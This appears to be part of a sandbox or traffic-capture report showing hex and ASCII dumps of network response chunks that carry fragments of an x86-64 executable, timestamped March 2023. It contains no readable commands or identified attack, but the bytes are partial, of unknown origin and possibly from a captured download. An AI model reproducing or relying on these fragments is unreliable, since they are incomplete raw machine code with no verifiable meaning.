                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5089INData Raw: 00 00 e8 a4 36 b1 ff 48 8b 0b 49 89 f8 ba c8 00 00 00 0f b6 01 83 e0 03 ff 14 c6 48 8b 4b 08 4c 8d 47 20 ba c8 00 00 00 0f b6 01 83 e0 03 48 8b 04 c6 48 83 c4 20 5b 5e 5f 5d 41 5c 48 ff e0 0f 1f 40 00 e8 43 1a c1 ff 48 8b 4b 08 e8 3a 1a c1 ff e9 61 ff ff ff 0f 1f 44 00 00 48 8b 0b e8 78 20 c1 ff 48 8b 4b 08 e8 6f 20 c1 ff e9 74 ff ff ff 90 90 90 90 90 90 90 90 90 90 41 54 55 57 56 53 48 83 ec 20 4c 89 cb 4c 89 c7 41 b9 c8 00 00 00 48 89 d5 4c 8b 03 48 89 ce e8 8c 3c b1 ff 4c 8b 43 08 48 8d 0c 2e 89 ea 41 b9 c8 00 00 00 e8 77 3c b1 ff 80 3d 50 d6 2e 00 00 0f 84 9a 00 00 00 48 8b 53 08 48 8b 0b 45 31 c9 41 b8 00 00 04 00 e8 75 81 c2 ff 48 89 d9 ff 15 cc d5 2e 00 80 3d 25 d6 2e 00 00 0f 84 8f 00 00 00 48 8b 53 08 48 8b 0b 45 31 c9 41 b8 00 00 04 00 e8 9a 8c
                                                                                                                                                                                                                    Data Ascii: 6HIHKLG HH [^_]A\H@CHK:aDHx HKo tATUWVSH LLAHLH<LCH.Aw<=P.HSHE1AuH.=%.HSHE1A
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5105INData Raw: 7e 28 00 74 14 48 8b 56 20 4c 89 f1 e8 b2 12 f4 ff 85 c0 0f 88 12 01 00 00 48 8b 46 18 31 d2 48 85 c0 75 d7 84 d2 0f 84 8f 01 00 00 48 39 75 48 74 40 48 89 f1 e8 51 67 0f 00 48 83 78 28 00 74 8a 48 83 bc 24 88 00 00 00 00 0f 84 7b ff ff ff 48 8b 48 20 48 8b 94 24 80 00 00 00 e8 62 12 f4 ff 85 c0 0f 89 62 ff ff ff 48 85 f6 0f 84 59 ff ff ff 41 be 01 00 00 00 49 39 f5 0f 85 f9 00 00 00 b9 58 00 00 00 e8 40 f0 0f 00 48 8d 48 20 4c 89 e2 49 89 c7 e8 a1 69 b5 ff 8b 84 24 90 00 00 00 4c 89 fa 4d 89 e9 49 89 f0 f3 0f 6f 94 24 a0 00 00 00 66 0f ef c0 41 0f b6 ce 41 89 47 30 48 8b 84 24 98 00 00 00 41 0f 11 57 40 49 89 47 38 48 8b 84 24 b0 00 00 00 0f 11 84 24 a0 00 00 00 49 89 47 50 48 c7 84 24 b0 00 00 00 00 00 00 00 e8 b6 73 0f 00 48 83 45 58 01 4c 8b bc 24 a0
                                                                                                                                                                                                                    Data Ascii: ~(tHV LHF1HuH9uHt@HQgHx(tH${HH H$bbHYAI9X@HH LIi$LMIo$fAAG0H$AW@IG8H$$IGPH$sHEXL$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5121INData Raw: 00 ff 3d 00 00 00 63 74 14 45 31 c0 3d 00 00 00 6b 41 0f 94 c0 4e 8d 04 85 04 00 00 00 49 69 c6 68 02 00 00 48 01 f8 44 8b 88 c0 03 00 00 45 89 cb 41 81 e3 00 00 00 ff 41 81 fb 00 00 00 63 0f 84 fa 00 00 00 41 81 fb 00 00 00 72 0f 84 ae 01 00 00 41 81 fb 00 00 00 41 0f 85 cf 00 00 00 48 69 c9 98 01 00 00 48 8b 57 78 4c 8d 7f 30 4c 8b 82 e0 00 00 00 8b 90 e0 03 00 00 48 01 d9 41 81 f9 00 00 00 41 0f 84 6b 02 00 00 4d 89 f9 e8 28 74 c3 ff 48 89 f9 84 c0 0f 85 ee 00 00 00 e8 38 12 00 00 84 c0 0f 84 02 fe ff ff 80 7f 5a 00 0f 84 6e fe ff ff e8 41 1e f4 ff e9 64 fe ff ff 0f 1f 40 00 48 8d 9c 24 80 00 00 00 48 c7 84 24 80 00 00 00 00 00 00 00 c7 84 24 88 00 00 00 00 2d 31 01 eb 0e 0f 1f 80 00 00 00 00 ff d6 83 38 04 75 10 48 89 da 48 89 d9 e8 8e 22 f4 ff 83 f8
                                                                                                                                                                                                                    Data Ascii: =ctE1=kANIihHDEAAcArAAHiHWxL0LHAAkM(tH8ZnAd@H$H$$-18uHH"
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5137INData Raw: eb f1 ff ff 41 8b 54 24 7c 45 8b 44 24 74 48 8d 4c 24 5c c7 44 24 5c 00 00 12 61 e8 0b 2c c1 ff 48 85 c0 0f 84 c6 f1 ff ff 49 89 d9 4d 89 f0 ba 4c 00 00 00 4c 89 e9 48 c7 44 24 20 00 00 00 00 ff d0 41 b8 40 00 00 00 48 8d 15 7c 3a 12 00 4c 89 f1 e8 e4 91 f3 ff 85 c0 0f 94 c0 e9 90 f1 ff ff 66 2e 0f 1f 84 00 00 00 00 00 41 8b 54 24 7c 45 8b 44 24 74 48 8d 4c 24 5c c7 44 24 5c 00 00 00 41 e8 a4 2b c1 ff 48 85 c0 0f 84 5f f1 ff ff 49 8d 5c 24 30 ba 4c 00 00 00 48 c7 44 24 20 00 00 00 00 4d 8d 8c 24 98 00 00 00 49 89 d8 48 8d 0d 76 54 12 00 ff d0 48 b8 98 fe 6d 22 65 27 68 90 49 33 44 24 38 48 ba 7e 88 44 f2 d6 b7 a4 34 49 33 54 24 30 48 09 d0 0f 85 0f f2 ff ff 48 b8 9e 5a aa a6 3e dc e1 c1 49 33 44 24 48 48 ba 23 da 8a 52 f9 fc 4e c6 49 33 54 24 40 48 09 d0
                                                                                                                                                                                                                    Data Ascii: AT$|ED$tHL$\D$\a,HIMLLHD$ A@H|:Lf.AT$|ED$tHL$\D$\A+H_I\$0LHD$ M$IHvTHm"e'hI3D$8H~D4I3T$0HHZ>I3D$HH#RNI3T$@H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5153INData Raw: 00 00 49 89 f1 44 89 d2 e8 ae f4 c2 ff 4c 89 f1 84 c0 0f 85 db 00 00 00 e8 ce 14 00 00 84 c0 74 42 66 2e 0f 1f 84 00 00 00 00 00 41 80 be ba 00 00 00 00 0f 84 02 fe ff ff e8 bd 9e f3 ff e9 f8 fd ff ff 0f 1f 84 00 00 00 00 00 81 fe 00 00 00 6c 75 48 4c 89 f1 e8 90 14 00 00 84 c0 75 cc 0f 1f 40 00 4c 89 f1 e8 b0 f7 ff ff 48 8b 05 f9 09 25 00 48 8b 00 48 85 c0 0f 85 56 fd ff ff 48 81 c4 d8 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 66 0f 1f 84 00 00 00 00 00 41 8b 96 bc 00 00 00 45 8b 86 b4 00 00 00 4c 89 e1 49 8d 76 30 e8 76 eb c0 ff 48 69 d7 68 02 00 00 41 0f b6 8e b0 12 00 00 4d 8d 8e d8 00 00 00 48 69 c9 60 06 00 00 4c 01 f2 4c 8b 82 38 0e 00 00 4c 01 e9 4c 89 44 24 20 49 89 f0 48 8b 92 e0 0d 00 00 ff d0 4c 89 f1 e8 f3 13 00 00 84 c0 0f 84 63 ff ff
                                                                                                                                                                                                                    Data Ascii: IDLtBf.AluHLu@LH%HHVH[^_]A\A]A^A_fAELIv0vHihAMHi`LL8LLD$ IHLc
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5169INData Raw: 00 00 00 48 8d 15 c1 b9 11 00 4c 89 e9 e8 29 12 f3 ff 85 c0 0f 94 c0 e9 19 f6 ff ff 4c 89 e1 ff d2 41 8b 8c 24 d0 00 00 00 4d 8b 8c 24 20 01 00 00 e9 b1 fa ff ff 48 8d 04 80 83 e1 07 41 b8 00 00 40 01 48 c1 e0 16 48 8d 14 c8 c1 e2 03 48 63 d2 e9 e4 f7 ff ff 90 90 90 90 90 41 56 41 55 41 54 55 57 56 53 48 83 ec 30 0f b6 91 10 16 00 00 89 d0 48 89 cf 0f b6 ca 48 81 c1 30 05 00 00 44 8b 8f 30 16 00 00 8b b4 8f 30 01 00 00 45 85 c9 44 8d 46 01 48 8d b7 30 01 00 00 44 89 84 8f 30 01 00 00 0f 85 ca 00 00 00 41 81 e0 ff 7f 00 00 0f 84 78 01 00 00 31 ed 0f b6 d8 48 63 d2 48 69 d2 68 02 00 00 48 69 c3 68 02 00 00 4c 8b a4 17 40 11 00 00 48 8d 8c 06 f0 0f 00 00 e8 ca f8 b1 ff 48 89 da 4c 0f af e5 44 0f b6 af 10 16 00 00 48 c1 e2 08 48 98 48 29 da 48 8d 14 d6 4c 01
                                                                                                                                                                                                                    Data Ascii: HL)LA$M$ HA@HHHcAVAUATUWVSH0HH0D00EDFH0D0Ax1HcHihHihL@HHLDHHH)HL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5185INData Raw: 83 f0 0a 00 00 48 83 c4 20 5b 41 5c 41 5d 48 ff e0 90 90 90 90 90 90 90 90 90 90 4c 8b 05 d9 83 24 00 48 8b 81 f0 0a 00 00 45 8b 48 20 4c 8b 81 b0 0a 00 00 4c 8d 91 80 09 00 00 48 8d 91 a0 0a 00 00 4c 89 d1 48 ff e0 90 90 90 41 55 41 54 48 83 ec 28 48 8d 05 d1 3e 25 00 66 0f ef c0 45 31 c0 ba 01 00 00 00 48 c7 81 b8 0a 00 00 00 00 00 00 49 89 cc 48 8d 89 d0 0a 00 00 48 89 81 30 f5 ff ff 0f 11 41 d8 e8 20 06 c2 ff 90 48 83 c4 28 41 5c 41 5d c3 49 89 c5 4c 89 e1 e8 cb 36 00 00 4c 89 e9 e8 93 df f1 ff 90 90 90 41 55 41 54 48 83 ec 28 48 8d 05 71 3e 25 00 66 0f ef c0 45 31 c0 ba 01 00 00 00 48 c7 81 b8 0a 00 00 00 00 00 00 49 89 cc 48 8d 89 d0 0a 00 00 48 89 81 30 f5 ff ff 0f 11 41 d8 e8 c0 05 c2 ff 90 48 83 c4 28 41 5c 41 5d c3 49 89 c5 4c 89 e1 e8 6b 36 00
                                                                                                                                                                                                                    Data Ascii: H [A\A]HL$HEH LLHLHAUATH(H>%fE1HIHH0A H(A\A]IL6LAUATH(Hq>%fE1HIHH0AH(A\A]ILk6
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5201INData Raw: 90 90 90 90 90 90 90 90 90 90 90 53 48 83 ec 20 48 89 cb e8 83 79 08 00 48 8d 05 2c 03 25 00 48 89 03 48 83 c4 20 5b c3 90 90 90 41 54 48 83 ec 20 48 8b 05 23 5a 24 00 48 83 c0 10 48 89 01 49 89 cc e8 c4 5f 08 00 49 8d 4c 24 48 e8 6a cd 07 00 48 8b 05 a3 5a 24 00 49 8d 4c 24 38 48 83 c0 10 49 89 04 24 e8 01 2d 0a 00 4c 89 e1 48 83 c4 20 41 5c e9 03 70 0e 00 48 89 c1 e8 9b 71 0e 00 e8 76 73 0e 00 eb c0 90 90 90 90 53 48 83 ec 20 48 8b 05 c4 59 24 00 48 83 c0 10 48 89 01 48 89 cb e8 65 5f 08 00 48 8d 4b 48 e8 0c cd 07 00 48 8b 05 45 5a 24 00 48 8d 4b 38 48 83 c0 10 48 89 03 48 83 c4 20 5b e9 a0 2c 0a 00 48 89 c1 e8 48 71 0e 00 e8 23 73 0e 00 eb cc 90 53 48 83 ec 20 48 8b 05 74 59 24 00 48 83 c0 10 48 89 01 48 89 cb e8 15 5f 08 00 48 8d 4b 48 e8 bc cc 07 00
                                                                                                                                                                                                                    Data Ascii: SH HyH,%HH [ATH H#Z$HHI_IL$HjHZ$IL$8HI$-LH A\pHqvsSH HY$HHHe_HKHHEZ$HK8HHH [,HHq#sSH HtY$HHH_HKH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5217INData Raw: 0f 1f 00 49 3b 44 24 20 0f 83 fd 03 00 00 48 83 c0 01 49 89 44 24 28 80 38 75 0f 85 03 0f 00 00 49 39 44 24 20 0f 86 78 04 00 00 48 83 c0 01 49 89 44 24 28 80 38 6c 0f 85 e6 0e 00 00 49 39 44 24 20 0f 86 23 06 00 00 48 83 c0 01 49 89 44 24 28 80 38 6c 0f 85 c9 0e 00 00 49 39 44 24 20 0f 86 12 06 00 00 48 83 c0 01 49 89 44 24 28 48 8b 43 40 48 8b 73 38 48 89 c2 48 29 f2 48 83 fa 0f 0f 8e 0d 0f 00 00 48 8d 46 10 48 89 43 38 48 c7 06 00 00 00 00 48 c7 46 08 00 00 00 00 e9 7c fe ff ff 66 0f 1f 84 00 00 00 00 00 49 3b 44 24 20 0f 83 8d 02 00 00 48 83 c0 01 49 89 44 24 28 80 38 72 0f 85 5b 0e 00 00 49 3b 44 24 20 0f 83 68 04 00 00 48 83 c0 01 49 89 44 24 28 80 38 75 0f 85 3e 0e 00 00 49 3b 44 24 20 0f 83 b3 06 00 00 48 83 c0 01 49 89 44 24 28 80 38 65 0f 85 21
                                                                                                                                                                                                                    Data Ascii: I;D$ HID$(8uI9D$ xHID$(8lI9D$ #HID$(8lI9D$ HID$(HC@Hs8HH)HHFHC8HHF|fI;D$ HID$(8r[I;D$ hHID$(8u>I;D$ HID$(8e!
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5233INData Raw: 49 89 70 38 66 89 46 fe 85 db 0f 85 3c 02 00 00 48 b8 00 00 00 00 00 00 ff ff 48 21 46 f8 66 0f d6 76 f0 e9 1f f4 ff ff 49 83 78 20 00 0f 84 6d 02 00 00 49 8b 40 48 e9 b7 f8 ff ff 49 83 78 20 00 0f 84 80 02 00 00 49 8b 40 48 e9 3b f8 ff ff 48 83 c2 01 49 8b 70 38 49 8b 48 10 66 0f 6e fb 49 89 14 24 41 89 dc 66 0f 70 f7 e0 49 c1 e4 05 4c 29 e6 49 89 70 38 41 b8 03 00 00 00 66 44 89 46 fe 85 db 74 8a 4c 89 e2 e8 1d 8f 00 00 48 89 c1 48 b8 00 00 00 00 00 00 ff ff 4d 89 e0 48 89 f2 48 23 46 f8 48 09 c8 48 89 46 f8 e8 92 11 f2 ff e9 68 ff ff ff 48 8d 42 01 49 89 04 24 0f b6 4a 01 80 f9 20 77 2c 48 0f a3 ce 72 26 48 8d 42 02 48 83 c2 11 48 89 d1 48 83 e1 f0 48 39 c8 74 49 66 2e 0f 1f 84 00 00 00 00 00 0f b6 10 80 fa 20 76 28 49 89 04 24 80 38 22 0f 84 77 f8 ff
                                                                                                                                                                                                                    Data Ascii: Ip8fF<HH!FfvIx mI@HIx I@H;HIp8IHfnI$AfpIL)Ip8AfDFtLHHMHH#FHHFhHBI$J w,Hr&HBHHHH9tIf. v(I$8"w
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5249INData Raw: 4d 85 f6 0f 84 b1 01 00 00 4c 29 f0 48 8d 50 01 48 d1 ea 48 01 d0 4d 29 f7 49 8d 77 10 48 39 c6 48 0f 42 f0 48 85 f6 0f 84 13 02 00 00 48 89 f2 4c 89 f1 e8 43 d2 f1 ff 49 01 c7 66 48 0f 6e c0 48 01 f0 66 49 0f 6e ef 49 89 44 24 40 66 0f 6c c5 41 0f 11 44 24 30 e9 1e fd ff ff 4d 8b 74 24 30 4d 85 f6 0f 84 3a 01 00 00 4c 29 f0 48 8d 50 01 48 d1 ea 48 01 d0 4d 29 f7 49 8d 77 10 48 39 c6 48 0f 42 f0 48 85 f6 0f 84 76 01 00 00 48 89 f2 4c 89 f1 e8 e2 d1 f1 ff 49 01 c7 66 48 0f 6e c0 48 01 f0 66 49 0f 6e ef 49 89 44 24 40 66 0f 6c c5 41 0f 11 44 24 30 e9 a0 fd ff ff 4d 8b 74 24 30 4d 85 f6 0f 84 1b 01 00 00 4c 29 f0 48 8d 50 01 48 d1 ea 48 01 d0 4d 29 f7 49 8d 7f 10 48 39 c7 48 0f 42 f8 48 85 ff 0f 84 60 01 00 00 48 89 fa 4c 89 f1 e8 81 d1 f1 ff 49 01 c7 66 48
                                                                                                                                                                                                                    Data Ascii: ML)HPHHM)IwH9HBHHLCIfHnHfInID$@flAD$0Mt$0M:L)HPHHM)IwH9HBHvHLIfHnHfInID$@flAD$0Mt$0ML)HPHHM)IH9HBH`HLIfH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5265INData Raw: 85 c0 74 cf 0f b7 c0 bf ff ff ff ff 0f bc c0 0f 44 c7 48 98 48 01 c3 0f b6 13 48 89 de e9 a9 fd ff ff 66 0f 1f 84 00 00 00 00 00 c6 06 00 8b 41 30 48 83 c3 01 48 8d 7e 01 85 c0 75 4c 49 8b 44 24 40 4d 8b 6c 24 38 4c 29 d6 48 83 ee 01 48 89 c2 4c 29 ea 45 84 c9 74 62 48 83 fa 0f 0f 8e 96 02 00 00 49 8d 45 10 49 89 44 24 38 48 b8 00 00 00 00 00 00 05 04 4c 09 f0 41 c7 45 04 00 00 00 00 49 89 45 08 41 89 75 00 66 48 0f 6e c3 66 48 0f 6e ef 0f 10 74 24 30 4c 89 7d 10 66 0f 6c c5 0f 11 45 00 48 83 c4 48 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 66 0f 1f 44 00 00 48 83 fa 0f 0f 8e c1 01 00 00 49 8d 45 10 49 89 44 24 38 48 b8 00 00 00 00 00 00 05 04 49 09 c6 41 c7 45 04 00 00 00 00 4d 89 75 08 41 89 75 00 eb 9c 66 0f 1f 44 00 00 48 89 d8 4c 29 f8 84 d2 75 1e c7 41
                                                                                                                                                                                                                    Data Ascii: tDHHHfA0HH~uLID$@Ml$8L)HHL)EtbHIEID$8HLAEIEAufHnfHnt$0L}flEHH[^_]A\A]A^A_fDHIEID$8HIAEMuAufDHL)uA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5281INData Raw: 90 90 90 90 90 90 90 90 90 90 90 48 8d 15 99 ff ff ff 48 8b 01 48 8b 40 20 48 39 d0 75 0d 8b 81 94 00 00 00 c1 e8 0e 83 e0 01 c3 ba 0e 00 00 00 48 ff e0 90 90 90 90 90 90 90 90 48 8d 41 0d c3 90 90 90 90 90 90 90 90 90 90 90 31 c0 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 81 84 00 00 00 c3 90 90 90 90 90 90 90 90 90 31 c0 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 48 8d 41 60 c3 90 90 90 90 90 90 90 90 90 90 90 48 8d 15 19 ff ff ff 48 8b 01 48 8b 40 20 48 39 d0 75 0d 8b 81 94 00 00 00 83 e0 01 c3 0f 1f 00 31 d2 48 ff e0 90 90 90 90 90 90 90 90 90 90 90 48 8d 15 e9 fe ff ff 48 8b 01 48 8b 40 20 48 39 d0 75 0d 8b 81 94 00 00 00 c1 e8 02 83 e0 01 c3 ba 02 00 00 00 48 ff e0 90 90 90 90 90 90 90 90 48 8d 15 b9 fe ff ff 48 8b 01 48 8b 40 20 48 39 d0 75 0d 8b
                                                                                                                                                                                                                    Data Ascii: HHH@ H9uHHA11HA`HHH@ H9u1HHHH@ H9uHHHH@ H9u
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5297INData Raw: 4c 8b 54 24 40 4c 89 18 4c 8b 5c 24 38 4c 89 40 10 49 89 c0 49 89 02 e9 73 fe ff ff 48 8b 4c 24 28 48 8b 01 48 39 c2 48 0f 43 c2 48 83 79 08 00 48 89 44 24 30 0f 84 0f 04 00 00 48 8b 44 24 30 4c 89 44 24 48 31 c9 4c 89 5c 24 40 48 89 54 24 38 48 83 c0 18 0f 84 e4 fa ff ff 48 89 c1 4c 89 54 24 58 44 89 4c 24 50 e8 be 11 f1 ff 44 8b 4c 24 50 4c 8b 54 24 58 48 85 c0 49 89 c0 48 89 c1 0f 84 b9 fa ff ff 48 8b 44 24 30 49 c7 40 08 00 00 00 00 4c 8b 5c 24 40 49 89 00 4c 8b 44 24 48 48 8b 44 24 38 4c 89 41 10 49 89 c8 49 89 0b b9 18 00 00 00 e9 11 fe ff ff 48 89 c1 48 8b 00 48 39 c2 48 0f 43 c2 48 83 79 08 00 49 89 c3 0f 84 c4 03 00 00 4c 89 d8 4c 89 44 24 48 31 c9 4c 89 54 24 40 48 89 54 24 38 4c 89 5c 24 30 48 83 c0 18 0f 84 f0 f8 ff ff 48 89 c1 44 89 4c 24 50
                                                                                                                                                                                                                    Data Ascii: LT$@LL\$8L@IIsHL$(HH9HCHyHD$0HD$0LD$H1L\$@HT$8HHLT$XDL$PDL$PLT$XHIHHD$0I@L\$@ILD$HHD$8LAIIHHH9HCHyILLD$H1LT$@HT$8L\$0HHDL$P
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5313INData Raw: 81 05 00 8b 74 24 20 48 85 f6 74 3c 0f 1f 80 00 00 00 00 41 0f b6 04 24 49 83 c4 01 45 0f b6 4c 05 00 49 89 c7 49 8b 06 48 8b 08 45 84 c9 0f 85 7f 06 00 00 41 0f be d7 e8 de 80 05 00 4c 89 e0 48 29 f8 48 39 c6 77 cb 49 8b 06 ba 22 00 00 00 48 8b 08 e8 c3 80 05 00 49 8b 46 18 49 39 46 20 0f 84 b5 08 00 00 48 8d 4d 10 4c 89 f2 e8 39 f8 ff ff 84 c0 0f 84 55 fe ff ff 48 b8 ff ff ff ff ff ff 00 00 8b 13 48 23 43 08 48 83 c5 20 48 c1 e2 05 48 01 d0 48 39 e8 0f 85 db fe ff ff 49 8b 46 20 49 8b 36 48 8d 50 f0 48 83 78 f0 00 49 89 56 20 0f 85 ac 0f 00 00 ba 7d 00 00 00 48 8b 0e e8 56 80 05 00 49 8b 46 18 49 39 46 20 0f 85 9e fb ff ff 49 8b 06 48 8b 08 e8 2d 82 05 00 49 8b 46 18 49 39 46 20 0f 85 85 fb ff ff 49 8b 06 48 8b 08 e8 14 82 05 00 e9 75 fb ff ff 0f 1f 80
                                                                                                                                                                                                                    Data Ascii: t$ Ht<A$IELIIHEALH)H9wI"HIFI9F HML9UHH#CH HHH9IF I6HPHxIV }HVIFI9F IH-IFI9F IHu
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5329INData Raw: 4d 23 00 e9 43 eb ff ff b9 01 00 00 00 e8 b9 70 0c 00 66 48 0f 6e c0 66 0f 6c c0 0f 11 07 eb c1 49 89 ca 48 8d 05 01 4d 23 00 e9 74 ed ff ff 49 89 cb 48 8d 05 f2 4c 23 00 e9 56 ed ff ff 48 89 da 48 8d 05 e3 4c 23 00 e9 51 f3 ff ff 49 89 db 48 8d 05 d4 4c 23 00 e9 34 f3 ff ff 4c 89 e9 e8 4f 91 f0 ff 31 c0 e9 50 fb ff ff 48 83 3f 00 74 27 48 8b 47 28 e9 1f fb ff ff 4c 89 e1 e8 31 91 f0 ff 31 c0 e9 82 fc ff ff 48 83 3e 00 74 21 48 8b 46 28 e9 51 fc ff ff b9 01 00 00 00 e8 29 70 0c 00 66 48 0f 6e c0 66 0f 6c c0 0f 11 07 eb c1 b9 01 00 00 00 e8 11 70 0c 00 66 48 0f 6e c0 66 0f 6c c0 0f 11 06 eb c7 4c 89 e1 e8 e3 90 f0 ff 31 c0 e9 03 f7 ff ff b9 01 00 00 00 e8 ea 6f 0c 00 66 48 0f 6e c0 66 0f 6c c0 0f 11 06 e9 ad fd ff ff b9 01 00 00 00 e8 cf 6f 0c 00 66 48 0f
                                                                                                                                                                                                                    Data Ascii: M#CpfHnflIHM#tIHL#VHHL#QIHL#4LO1PH?t'HG(L11H>t!HF(Q)pfHnflpfHnflL1ofHnflofH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5345INData Raw: 4e 8d 14 53 49 8d 14 53 49 39 d2 74 1e 31 c0 41 0f b7 1c 42 66 39 1c 42 75 41 48 83 c0 01 48 39 c8 75 ec 0f 1f 84 00 00 00 00 00 4d 29 c8 b8 ff ff ff 7f 49 81 f8 ff ff ff 7f 7f 10 49 81 f8 00 00 00 80 b8 00 00 00 80 41 0f 4d c0 48 83 c4 20 5b c3 66 0f 1f 84 00 00 00 00 00 19 c0 83 c8 01 48 83 c4 20 5b c3 49 89 d0 49 89 c1 48 8d 15 37 ba 21 00 48 8d 0d a1 b9 21 00 e8 cc ad 0b 00 4d 89 d0 48 8d 15 21 ba 21 00 48 8d 0d 8b b9 21 00 e8 b6 ad 0b 00 90 90 90 90 90 90 48 8b 12 48 89 c8 48 8b 4a e8 48 8d 14 4a 48 89 10 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 83 ec 28 48 8b 09 4c 8b 49 e8 48 89 d0 4c 89 c2 49 39 c1 72 05 48 83 c4 28 c3 49 89 c0 48 8d 0d 3b b9 21 00 e8 66 ad 0b 00 90 90 90 90 90 90 48 8b 01 48 8b 40 e8 48 29 d0 4c 39 c0 49 0f 47 c0 c3 90 90
                                                                                                                                                                                                                    Data Ascii: NSISI9t1ABf9BuAHH9uM)IIAMH [fH [IIH7!H!MH!!H!HHHJHJHH(HLIHLI9rH(IH;!fHH@H)L9IG
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5361INData Raw: ff ff ff ff 8b 44 24 78 48 8b 74 24 70 48 21 d3 8b 94 24 84 00 00 00 48 09 c3 48 8b 84 24 b0 00 00 00 85 d2 74 35 48 8b 8c 24 20 01 00 00 89 11 49 89 34 24 49 89 5c 24 08 48 85 c0 74 05 4c 89 e9 ff d0 4c 89 e0 48 81 c4 c0 00 00 00 5b 5e 41 5c 41 5d 41 5e c3 0f 1f 44 00 00 48 85 c0 74 7b 48 8b 8c 24 90 00 00 00 48 8b 94 24 98 00 00 00 4c 8d b4 24 83 00 00 00 4d 89 f0 48 01 ca e8 d8 e3 04 00 48 8b 8c 24 28 01 00 00 48 8d 94 24 88 00 00 00 48 89 84 24 88 00 00 00 e8 2b eb 04 00 48 8b 8c 24 88 00 00 00 ba ff ff ff ff f0 0f c1 51 f8 48 8b 84 24 b0 00 00 00 85 d2 0f 8f 6e ff ff ff 48 83 e9 18 4c 89 f2 e8 8d e8 04 00 48 8b 84 24 b0 00 00 00 e9 55 ff ff ff 48 8d 0d 43 76 21 00 e8 14 40 0c 00 49 89 c4 48 8b 84 24 b0 00 00 00 48 85 c0 74 05 4c 89 e9 ff d0 4c 89 e1
                                                                                                                                                                                                                    Data Ascii: D$xHt$pH!$HH$t5H$ I4$I\$HtLLH[^A\A]A^DHt{H$H$L$MHH$(H$H$+H$QH$nHLH$UHCv!@IH$HtLL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5377INData Raw: c6 43 20 00 48 c7 43 28 00 00 00 00 48 c7 43 30 00 00 00 00 48 c7 43 38 00 00 00 00 48 c7 43 40 00 00 00 00 c6 83 88 00 00 00 00 e8 9b b0 0b 00 31 d2 49 89 c5 c7 40 08 00 00 00 00 48 8b 05 88 9c 21 00 49 89 5d 10 4c 89 e9 48 83 c0 10 49 89 45 00 e8 14 ea 0a 00 4d 89 65 18 f0 41 83 44 24 08 01 48 8d 05 22 47 22 00 31 c9 49 89 45 00 49 89 d8 4c 89 e2 49 89 5d 20 e8 2d 56 05 00 e9 29 fe ff ff 0f 1f 84 00 00 00 00 00 b9 18 00 00 00 e8 36 b0 0b 00 c7 40 08 00 00 00 00 49 89 c5 48 8b 05 45 9c 21 00 4d 89 65 10 48 83 c0 10 49 89 45 00 f0 41 83 44 24 08 01 48 8d 05 0b 48 22 00 49 89 45 00 e9 e3 fd ff ff b9 20 00 00 00 e8 f8 af 0b 00 c7 40 08 00 00 00 00 49 89 c5 48 8b 05 87 9b 21 00 48 83 c0 10 49 89 45 00 e8 7a 68 07 00 49 89 45 10 4d 89 65 18 f0 41 83 44 24 08
                                                                                                                                                                                                                    Data Ascii: C HC(HC0HC8HC@1I@H!I]LHIEMeAD$H"G"1IEILI] -V)6@IHE!MeHIEAD$HH"IE @IH!HIEzhIEMeAD$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5393INData Raw: 75 f1 49 c7 c3 ff ff ff ff 4c 89 d8 5b 5e 5f c3 0f 1f 00 49 39 d2 74 53 31 c0 49 39 c3 74 4c 44 0f b7 44 42 02 48 83 c0 01 66 45 3b 04 42 74 ea 48 83 c2 02 48 89 f8 48 29 d0 48 d1 f8 49 39 c1 77 c0 48 01 d8 75 ac 49 c7 c3 ff ff ff ff eb b9 0f 1f 00 4c 39 c7 49 c7 c3 ff ff ff ff 4d 0f 43 d8 4c 89 d8 5b 5e 5f c3 0f 1f 00 48 29 f2 49 89 d3 49 d1 fb 4c 89 d8 5b 5e 5f c3 4c 8b 4a 08 48 8b 12 e9 14 ff ff ff 90 90 90 90 49 c7 c1 ff ff ff ff 48 8b 41 08 49 39 c0 73 26 4c 8b 11 4c 29 c0 4b 8d 0c 42 48 85 c9 74 17 90 66 39 11 74 1b 48 83 c1 02 48 83 e8 01 75 f1 49 c7 c1 ff ff ff ff 4c 89 c8 c3 66 0f 1f 44 00 00 4c 29 d1 48 d1 f9 49 89 c9 4c 89 c8 c3 90 90 90 48 8b 12 48 89 c8 48 89 11 c3 90 90 90 90 90 90 48 8b 41 08 c3 90 90 90 90 90 90 90 90 90 90 90 48 8b 01 c3
                                                                                                                                                                                                                    Data Ascii: uIL[^_I9tS1I9tLDDBHfE;BtHHH)HI9wHuIL9IMCL[^_H)IIL[^_LJHIHAI9s&LL)KBHtf9tHHuILfDL)HILHHHHAH
